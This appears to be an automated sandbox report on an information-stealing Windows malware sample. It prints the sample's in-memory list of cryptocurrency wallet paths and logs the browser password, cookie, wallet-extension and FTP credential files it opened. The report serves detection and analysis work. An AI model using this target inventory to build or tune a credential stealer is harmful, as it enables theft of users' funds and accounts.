Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: c3e1e78f6d.exe, 00000017.00000003.2807718354.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger LiveO
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
